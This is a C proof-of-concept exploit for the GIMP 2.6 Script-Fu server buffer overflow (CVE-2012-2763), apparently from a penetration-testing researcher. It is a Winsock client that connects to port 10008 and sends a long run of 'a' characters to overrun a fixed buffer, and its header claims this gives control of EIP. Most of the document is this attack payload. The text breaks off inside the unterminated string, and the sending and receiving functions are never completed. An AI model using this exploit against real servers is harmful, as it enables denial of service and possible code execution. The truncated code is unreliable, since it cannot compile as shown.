/*
# There is a buffer overflow in the script-fu server component of GIMP
# (the GNU Image Manipulation Program) in all 2.6 versions (Windows and Linux
# versions), affecting both the script-fu console and the script-fu network
# server. A crafted message to the script-fu server overflows a buffer and
# overwrites several function pointers, allowing the attacker to gain control
# of EIP and potentially execute arbitrary code. This issue is fixed in the
# latest stable GIMP version (currently 2.8.0).
#
# CVE number: CVE-2012-2763
# Impact: high
# Vendor Homepage: http://www.gimp.org/
# Date found: 18/05/2012
# Found by: d of Reaction Information Security
# Homepage: http://www.reactionpenetrationtesting.co.uk

==== POC ====
*/

////////////////////////////////////////////////////////////////
//                                                            //
// PoC for GIMP <= 2.6 Script-Fu server buffer overflow       //
// Author: Joseph Sheridan                                    //
// Date: 20/05/2012                                           //
//                                                            //
// compile with cl scriptfubof.c /link wsock32.lib            //
////////////////////////////////////////////////////////////////

#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define DEFAULT_PORT  10008        // Script-Fu server default port
#define DEFAULT_PROTO SOCK_STREAM  // TCP socket type

void senddata(void);
void recvdata(void);

WSADATA wsaData;
SOCKET  conn_socket;
char    Buffer[2000000];
char    inBuffer[128];

void Usage(void)
{
    printf("Usage: scriptfubof servername portnumber\n");
    fflush(stdout);
    exit(1);
}

int main(int argc, char *argv[])
{
    unsigned short     port = DEFAULT_PORT;
    int                retval;
    int                socket_type = DEFAULT_PROTO;
    struct sockaddr_in server;

    // servername must be a dotted-quad IPv4 address: inet_addr() does no name resolution
    if (argc < 3) {
        Usage();
    }

    if ((retval = WSAStartup(0x202, &wsaData)) != 0) {
        fprintf(stderr, "WSAStartup() failed with error %d\n", retval);
        WSACleanup();
        return -1;
    }

    // Get portnum
    port = (unsigned short) atoi(argv[2]);

    memset(&server, 0, sizeof(server));
    server.sin_addr.s_addr = inet_addr(argv[1]);
    server.sin_family      = AF_INET;
    server.sin_port        = htons(port);
    if (server.sin_addr.s_addr == INADDR_NONE) {
        fprintf(stderr, "Client: '%s' is not a valid IPv4 address\n", argv[1]);
        WSACleanup();
        return -1;
    }

    conn_socket = socket(AF_INET, socket_type, 0);  /* Open a socket */
    if (conn_socket == INVALID_SOCKET) {            /* SOCKET is unsigned, so test against INVALID_SOCKET, not < 0 */
        fprintf(stderr, "Client: Error Opening socket: Error %d\n", WSAGetLastError());
        WSACleanup();
        return -1;
    }

    if (connect(conn_socket, (struct sockaddr *) &server, sizeof(server)) == SOCKET_ERROR) {
        fprintf(stderr, "Client: connect() failed: %d\n", WSAGetLastError());
        WSACleanup();
        return -1;
    }

    // Send the oversized command
    senddata();
    // Receive the reply, if the server is still alive to send one
    recvdata();

    closesocket(conn_socket);
    WSACleanup();
    return 0;
}

void senddata(void)
{
    int retval = 0;

    // The command: a long run of 'a' that overruns the server's fixed-size buffer.
    unsigned char command[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa